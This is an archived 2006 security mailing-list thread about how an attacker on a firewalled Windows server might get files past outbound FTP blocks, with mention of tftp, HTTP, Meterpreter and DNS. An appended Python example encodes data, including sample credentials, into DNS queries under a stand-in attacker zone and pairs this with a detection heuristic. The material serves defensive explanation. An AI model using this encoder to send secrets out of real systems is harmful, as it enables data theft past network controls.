Re: Question: FTP via alternate port

From: Hugo Fortier (hfortier@recon.cx)
Date: Mon Jan 30 2006 - 12:41:20 EST


I really don't see where you are going with FTP. While FTP can be
very hard to use in that kind of situation, the attacker could simply
use HTTP or HTTPS to transfer files if those ports are open. Your
issue is more than just with the FTP server; FTP is probably the worst
protocol to use in that kind of situation. If your concern is about him
launching the available commands from the system (i.e. he can't install
new programs), you should also look at tftp.exe. The TFTP protocol is a lot
simpler than FTP, and it will work way better than FTP when you try
to bypass a firewall.

I have seen hardened Windows boxes that had cmd.exe, ftp, tftp and a
bunch of other programs removed from the system; you basically had to
pop a CD in the system to administer it locally.

Depending on how the server has been compromised, the attacker could
also be using Metasploit and Meterpreter.

Normally I like to configure my servers so that they cannot initiate
communication to untrusted IPs; they can only accept connections. Also,
even if you block the server from initiating outgoing communication to
the Internet, the attacker might still be able to communicate the
information with the DNS protocol, so if you're really paranoid, block
the server from doing DNS lookups.

FTP seems to be the last resort I would use to transfer a file during
a pentest. As you dig, I am sure you'll find bigger concerns than FTP.

Hugo

On 26-Jan-06, at 3:27 PM, Niels Taylor wrote:

>
> Hello list, I hope this question is not too "newbie," and I am sure
> if it is I will find out quickly. I am interested in ways an attacker
> could circumvent outbound FTP restrictions on a FW. I have researched
> this a bit, but the information I am seeing is ambiguous, so I thought
> I'd take it straight to the experts.
>
> If a remote attacker gains command line access to a server (I am
> concerned about a Microsoft 2000 SQL server specifically) that is
> behind a firewall, and outbound FTP has been disabled at the FW,
> could the attacker use the MS FTP "open" command to specify a
> different, unrestricted outbound port (e.g. 80 or 443) to transfer
> files (assuming of course that his FTP server is configured to listen
> on this port)? Is this a viable scenario, and if not, could he send
> files via another method? This question assumes no outbound
> application layer inspection at the FW, so that it isn't able to
> see FTP traffic on port 23, or 80, for instance.
>
> Thank you for your help.
>
> Niels Taylor
>
>
>
> ----------------------------------------------------------------------
> --------
> Audit your website security with Acunetix Web Vulnerability Scanner:
>
> Hackers are concentrating their efforts on attacking applications
> on your
> website. Up to 75% of cyber attacks are launched on shopping carts,
> forms,
> login pages, dynamic content etc. Firewalls, SSL and locked-down
> servers are
> futile against web application hacking. Check your website for
> vulnerabilities
> to SQL injection, Cross site scripting and other web attacks before
> hackers do!
> Download Trial at:
>
> http://www.securityfocus.com/sponsor/pen-test_050831
> ----------------------------------------------------------------------
> ---------
>

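Added example (not part of the original thread, and not Hugo's or Niels's code): Hugo's point that a host which can only resolve names can still leak data. The sender side packs bytes into base32 DNS labels under a hypothetical attacker zone (`exfil.example` here, an assumption), the receiver side reverses it, and `is_suspicious()` is the kind of resolver-log check a defender would run to catch such names; the payload and the zone name are constructed for the demo.

```python
"""Data leaving a host via DNS query names alone, plus a log-side check.

Added example: the zone, the payload and the thresholds are assumptions
chosen for illustration, not values from the original message.
"""
import base64
import math
from collections import Counter

MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a printable name is at most 253 characters


def encode_queries(data: bytes, zone: str, labels_per_query: int = 3) -> list[str]:
    """Sender side: base32 the data (DNS labels are case-insensitive, so
    base32 is safe), cut it into 63-char labels, and build one query name
    per chunk.  A leading sequence label lets the receiver reorder queries
    that arrive out of order."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names = []
    for seq, start in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([str(seq), *labels[start:start + labels_per_query], zone])
        if len(name) > MAX_NAME:
            raise ValueError("query name too long; lower labels_per_query")
        names.append(name)
    return names


def decode_queries(names: list[str], zone: str) -> bytes:
    """Receiver side (the authoritative server for `zone`): strip the zone,
    order by the sequence label, rejoin the data labels, undo base32."""
    suffix = "." + zone
    ordered = sorted(names, key=lambda n: int(n.split(".", 1)[0]))
    chunks = []
    for n in ordered:
        bare = n[:-len(suffix)] if n.endswith(suffix) else n
        chunks.append("".join(bare.split(".")[1:]))   # drop the sequence label
    payload = "".join(chunks).upper()
    payload += "=" * (-len(payload) % 8)              # restore base32 padding
    return base64.b32decode(payload)


def shannon_entropy(s: str) -> float:
    """Bits per character; ordinary hostnames score low, encoded data high."""
    n = len(s)
    if n == 0:
        return 0.0
    counts = Counter(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_suspicious(name: str, max_label: int = 40, min_entropy: float = 3.5) -> bool:
    """Heuristic for resolver logs: a label that is very long, or that is
    reasonably long and looks random, is typical of tunnelled data rather
    than of a hostname a human chose.  Thresholds are assumptions."""
    labels = name.rstrip(".").split(".")
    longest = max(labels, key=len)
    if len(longest) > max_label:
        return True
    return len(longest) >= 16 and shannon_entropy(longest) > min_entropy


# Constructed sample payload and hypothetical attacker-controlled zone.
SAMPLE = b"Server=SQL01;User Id=sa;Password=Winter2006!"
ZONE = "exfil.example"

if __name__ == "__main__":
    queries = encode_queries(SAMPLE, ZONE)
    for q in queries:
        print(q, "<- flagged" if is_suspicious(q) else "")
    assert decode_queries(queries, ZONE) == SAMPLE
```

Each query here carries up to three 63-character labels, so a few hundred bytes of configuration or credentials cross the firewall in a handful of lookups that the host's own resolver forwards for it. The check does not need to know the zone: it looks only at label length and entropy, which is why restricting which hosts may resolve at all (Hugo's suggestion) is the stronger control when the server has no business doing lookups.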



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:25 EDT